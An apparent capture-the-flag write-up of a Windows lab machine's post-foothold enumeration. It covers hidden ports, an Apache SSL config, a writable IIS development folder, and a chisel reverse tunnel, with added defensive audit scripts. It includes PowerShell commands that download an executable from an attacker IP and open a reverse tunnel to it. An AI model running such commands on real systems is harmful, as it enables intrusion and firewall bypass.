Web
Two ports that were not visible from the outside were identified on the target system upon gaining the initial foothold: 443 and 8000.
While this was [[Flight_Automated#|confirmed]] by PEAS at a later stage, I found something interesting.
Port 443:
- has been opened (listening)
- is being used by Apache's httpd.exe
Port 8000:
- has been opened (listening)
- is being used by SYSTEM
443
PS C:\> cat C:\xampp\apache\conf\extra\httpd-ssl.conf | Where-Object { $_ -notmatch '^#' } | ForEach-Object { $_.TrimEnd() }
Listen 443
SSLCipherSuite HIGH:MEDIUM:!MD5:!RC4:!3DES
SSLProxyCipherSuite HIGH:MEDIUM:!MD5:!RC4:!3DES
SSLHonorCipherOrder on
SSLProtocol all -SSLv3
SSLProxyProtocol all -SSLv3
SSLPassPhraseDialog builtin
SSLSessionCache "shmcb:/xampp/apache/logs/ssl_scache(512000)"
SSLSessionCacheTimeout 300
<VirtualHost _default_:443>
DocumentRoot "/xampp/htdocs"
ServerName www.example.com:443
ServerAdmin admin@example.com
ErrorLog "/xampp/apache/logs/error.log"
TransferLog "/xampp/apache/logs/access.log"
SSLEngine on
SSLCertificateFile "conf/ssl.crt/server.crt"
SSLCertificateKeyFile "conf/ssl.key/server.key"
<FilesMatch "\.(cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory "/xampp/apache/cgi-bin">
SSLOptions +StdEnvVars
</Directory>
BrowserMatch "MSIE [2-5]" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
CustomLog "/xampp/apache/logs/ssl_request.log" \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
</VirtualHost>
Checking the SSL configuration of the Apache XAMPP install suggests that the web applications were planned to be hosted over HTTPS, although that is not reachable at the moment due to the firewall restriction.
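The captured httpd-ssl.conf is worth more than a "planned for HTTPS" note: `SSLProtocol all -SSLv3` still leaves TLS 1.0 and 1.1 enabled, and the cipher string excludes MD5, RC4 and 3DES by name but not anonymous key exchange. The following added example (not part of the original write-up) parses the non-comment directives the way they were captured above and reports those points next to a constructed hardened counterpart. It assumes that `all` expands to SSLv3 through TLSv1.3 on a current Apache 2.4 build; the hostname in the hardened sample is made up.

```python
"""Audit captured mod_ssl directives for legacy protocols and weak cipher settings.

Added example (not from the original write-up): it parses the non-comment lines
of an httpd-ssl.conf and reports what a reviewer would want to know before the
vhost is exposed.
"""

# Constructed sample: the directives captured from the target's httpd-ssl.conf.
SAMPLE_CONF = """\
Listen 443
SSLCipherSuite HIGH:MEDIUM:!MD5:!RC4:!3DES
SSLProxyCipherSuite HIGH:MEDIUM:!MD5:!RC4:!3DES
SSLHonorCipherOrder on
SSLProtocol all -SSLv3
SSLProxyProtocol all -SSLv3
<VirtualHost _default_:443>
DocumentRoot "/xampp/htdocs"
ServerName www.example.com:443
SSLEngine on
</VirtualHost>
"""

# Constructed hardened counterpart for comparison (hostname is made up).
HARDENED_CONF = """\
SSLProtocol -all +TLSv1.2 +TLSv1.3
SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:!aNULL:!MD5:!RC4:!3DES
SSLHonorCipherOrder on
ServerName srv01.corp.test:443
"""

# Assumption: on a current Apache 2.4 build "all" expands to exactly this set.
ALL_PROTOCOLS = {"SSLv3", "TLSv1", "TLSv1.1", "TLSv1.2", "TLSv1.3"}
LEGACY_PROTOCOLS = {"SSLv3", "TLSv1", "TLSv1.1"}
# Cipher families a reviewer expects to see excluded by name.
WEAK_CIPHER_TAGS = ("aNULL", "MD5", "RC4", "3DES")


def parse_directives(text):
    """Yield (name, value) for directive lines; comments and <section> tags are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "<")):
            continue
        name, _, value = line.partition(" ")
        yield name, value.strip()


def resolve_protocols(spec):
    """Expand an SSLProtocol value such as 'all -SSLv3' or '-all +TLSv1.2' into the enabled set."""
    enabled = set()
    for token in spec.split():
        name = token.lstrip("+-")
        members = ALL_PROTOCOLS if name.lower() == "all" else {name}
        if token.startswith("-"):
            enabled -= members
        else:
            enabled |= members
    return enabled


def audit(text):
    """Return a list of human-readable findings for one captured config."""
    conf = dict(parse_directives(text))  # later occurrences win, as in a flat config
    findings = []

    legacy = sorted(resolve_protocols(conf.get("SSLProtocol", "all")) & LEGACY_PROTOCOLS)
    if legacy:
        findings.append("SSLProtocol still enables legacy protocols: " + ", ".join(legacy))

    excluded = {t[1:] for t in conf.get("SSLCipherSuite", "").split(":") if t.startswith("!")}
    missing = [tag for tag in WEAK_CIPHER_TAGS if tag not in excluded]
    if missing:
        findings.append("SSLCipherSuite does not exclude: " + ", ".join(missing))

    if conf.get("SSLHonorCipherOrder", "off").lower() != "on":
        findings.append("SSLHonorCipherOrder is off; clients choose the cipher")

    if "example.com" in conf.get("ServerName", ""):
        findings.append("ServerName is still the template placeholder " + conf["ServerName"])

    return findings


if __name__ == "__main__":
    for label, text in (("captured", SAMPLE_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for finding in audit(text) or ["no findings"]:
            print("  -", finding)
```

Running it prints three findings for the captured config (legacy TLS 1.0/1.1, `aNULL` not excluded, placeholder ServerName) and none for the hardened one; the same functions can be pointed at any other `httpd-ssl.conf` dump collected during a review.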
8000
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/11/2023 7:47 PM inetpub
d----- 6/7/2022 6:39 AM PerfLogs
d-r--- 10/21/2022 11:49 AM Program Files
d----- 7/20/2021 12:23 PM Program Files (x86)
d----- 12/11/2023 5:05 PM Shared
d----- 9/22/2022 12:28 PM StorageReports
d----- 12/11/2023 7:11 PM tmp
d-r--- 9/22/2022 1:16 PM Users
d----- 10/21/2022 11:52 AM Windows
d----- 9/22/2022 1:16 PM xampp
Aside from those two web apps hosted from the Apache XAMPP install, there is also the default C:\inetpub directory.
PS C:\> cd inetpub ; ls
Directory: C:\inetpub
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:24 PM custerr
d----- 12/11/2023 8:02 PM development
d----- 9/22/2022 1:08 PM history
d----- 9/22/2022 12:32 PM logs
d----- 9/22/2022 12:24 PM temp
d----- 9/22/2022 12:28 PM wwwroot
PS C:\inetpub> ls wwwroot
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:28 PM aspnet_client
-a---- 9/22/2022 12:24 PM 703 iisstart.htm
-a---- 9/22/2022 12:24 PM 99710 iisstart.png
One of the directories suggests that this might be another web app in development.
development
PS C:\inetpub> ls development
Directory: C:\inetpub\development
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/11/2023 8:07 PM css
d----- 12/11/2023 8:07 PM fonts
d----- 12/11/2023 8:07 PM img
d----- 12/11/2023 8:07 PM js
-a---- 4/16/2018 2:23 PM 9371 contact.html
-a---- 4/16/2018 2:23 PM 45949 index.html
This appears to be a whole new web app.
Permission
PS C:\inetpub\development> icacls .
flight\c.bum:(OI)(CI)(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
The permissions set on the directory reveal something that could be leveraged: the user flight\c.bum holds an explicit write (W) entry that is inherited by subfolders and files (OI)(CI), while the other entries are the inherited defaults.
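A web root where a regular user account holds a write entry is exactly what a permissions audit should surface, and it is easy to miss when reading icacls output by eye across many entries. The following added example (not part of the original write-up) parses text in icacls' own layout, separates inheritance flags from rights, and flags every entry that grants write-class rights to a principal outside the expected administrative set. The sample is constructed from the listing above with canonical principal spellings; the path is passed in explicitly because icacls prints it in front of the first entry.

```python
"""Flag write-capable ACEs for non-administrative principals in icacls output.

Added example (not from the original write-up). It parses the text icacls prints
so the check can be run offline over output collected from many hosts.
"""
import re

# Constructed sample in icacls' own layout: the first entry follows the path, the
# rest are indented. Principal spellings are the canonical Windows ones.
SAMPLE_ICACLS = r"""C:\inetpub\development flight\c.bum:(OI)(CI)(W)
                       NT SERVICE\TrustedInstaller:(I)(F)
                       NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
                       NT AUTHORITY\SYSTEM:(I)(F)
                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                       BUILTIN\Administrators:(I)(F)
                       BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                       BUILTIN\Users:(I)(RX)
                       BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                       CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that are expected to hold full control on a web root.
TRUSTED = {
    "nt authority\\system",
    "nt service\\trustedinstaller",
    "builtin\\administrators",
    "creator owner",
}
# Simple rights and specific rights that allow creating or changing content.
WRITE_SIMPLE = {"F", "M", "W"}
WRITE_SPECIFIC = {"WD", "AD", "WA", "WEA", "DE", "DC", "WDAC", "WO", "GW", "GA"}
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}

ACE_RE = re.compile(r"^(?P<principal>[^:()]+?):(?P<groups>(?:\([^)]*\))+)\s*$")


def parse_icacls(text, path):
    """Return a list of ACE dicts for one icacls listing of `path`."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully"):
            continue
        if line.startswith(path):  # icacls prints the path before the first entry
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        flags = {g for g in groups if g in INHERITANCE_FLAGS}
        rights = set()
        for g in groups:
            if g not in INHERITANCE_FLAGS:
                rights.update(g.split(","))  # "(GR,GE)" style specific-rights lists
        aces.append({"path": path, "principal": m.group("principal"),
                     "flags": flags, "rights": rights})
    return aces


def writable_by_untrusted(aces):
    """Return the ACEs that grant write-class rights to principals outside TRUSTED."""
    return [ace for ace in aces
            if ace["principal"].lower() not in TRUSTED
            and ace["rights"] & (WRITE_SIMPLE | WRITE_SPECIFIC)]


def describe(ace):
    """One-line summary: who, which rights, whether inherited, and where it applies."""
    scope = []
    if "IO" not in ace["flags"]:
        scope.append("this folder")
    if "CI" in ace["flags"]:
        scope.append("subfolders")
    if "OI" in ace["flags"]:
        scope.append("files")
    origin = "inherited" if "I" in ace["flags"] else "explicit"
    return (f"{ace['principal']} has {','.join(sorted(ace['rights']))} "
            f"on {ace['path']} ({origin}; applies to {', '.join(scope)})")


if __name__ == "__main__":
    for hit in writable_by_untrusted(parse_icacls(SAMPLE_ICACLS, r"C:\inetpub\development")):
        print(hit and describe(hit))
```

For the listing above the only hit is the explicit `W` entry for `flight\c.bum`; `BUILTIN\Users` with `RX` and `GR,GE` is correctly left alone. The same functions work on `icacls` output saved from `C:\inetpub\wwwroot` or an XAMPP `htdocs` tree.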
Additionally, this is an internal web application, since the firewall blocks external access to it. I would need to tunnel it to check it out.
Tunneling with Chisel
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ chisel server -p 55555 --reverse -v
2023/12/12 04:19:24 server: Reverse tunnelling enabled
2023/12/12 04:19:24 server: Fingerprint Y+wlAaRrjWARfP426qX2zk2xeiMQbzqENdMB6aYp64s=
2023/12/12 04:19:24 server: Listening on http://0.0.0.0:55555
Starting a reverse chisel server on Kali port 55555.
PS C:\tmp> iwr -Uri http://10.10.16.8/chiselx64.exe -Outfile C:\tmp\chiselx64.exe
PS C:\tmp> cmd /c START /B C:\tmp\chiselx64.exe client 10.10.16.8:55555 R:8000:8000
2023/12/11 19:26:20 client: Connecting to ws://10.10.16.8:55555
2023/12/11 19:26:22 client: Connected (Latency 98.4606ms)
From the target system, I tunneled the Kali port 8000 to the target port 8000.
The command was wrapped in the PowerShell Start-Process cmdlet so that the terminal remained usable.
Tunnel established.
GUI
Webroot
It indeed appears to be an updated version of the original web application.
The GUI seems more modern.
This time, the submission form seems functional: it sends out a GET request with a few parameters, although there isn't any defined response.
However, the contact.html file does not seem to work, as there isn't any handler for such an operation.
The web app alone isn't exploitable.